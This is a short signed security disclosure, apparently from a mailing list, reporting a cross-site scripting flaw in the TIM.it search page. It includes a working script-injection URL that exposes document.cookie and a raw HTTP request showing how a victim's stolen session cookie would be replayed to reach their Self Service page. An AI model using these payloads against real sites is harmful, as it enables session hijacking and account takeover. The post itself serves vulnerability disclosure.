-----BEGIN PGP SIGNED MESSAGE-----<br>Hash: SHA1<br><br>TIM (Telecom Italia Mobile) is a big italian phone company. <br>The web portal TIM.it is vulnerable to XSS attacks in search function (<a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do">
http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do</a>). An attacker can steal cookie session and access with victim credential, inject html or arbitary script code.<br><br>Cookie view/steal:<br><br><a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E&amp;area=119%20Self%20Service">
http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E&amp;area=119%20Self%20Service</a><br><br>Access to Self Service personal page:<br><br>Get Request to: 
<a href="https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do">https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do</a> <br><br>Host: <a href="http://www.tim.it">www.tim.it</a><br>User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:
<a href="http://1.8.1.4">1.8.1.4</a>) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)<br>Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br>Accept-Language: it-it,it;q=
0.8,en-us;q=0.5,en;q=0.3<br>Accept-Encoding: gzip,deflate<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: 300<br>Connection: keep-alive<br>Cookie: insert cookie victim<br><br>- -- <br>Gianni Amato<br><a href="http://www.gianniamato.it/">
http://www.gianniamato.it/</a><br>-----BEGIN PGP SIGNATURE-----<br>Version: GnuPG v1.4.6 (GNU/Linux)<br>Comment: <a href="http://firegpg.tuxfamily.org">http://firegpg.tuxfamily.org</a><br><br>iD8DBQFGlkGeTxmfm2InrN8RAqoFAJ9L2qIfw6h8/Jjo2RDh0MXinxWqdACeNwJe
<br>fqj1R7QJhCl7cFGsPSiIwjs=<br>=nt8r<br>-----END PGP SIGNATURE-----<br><br><br>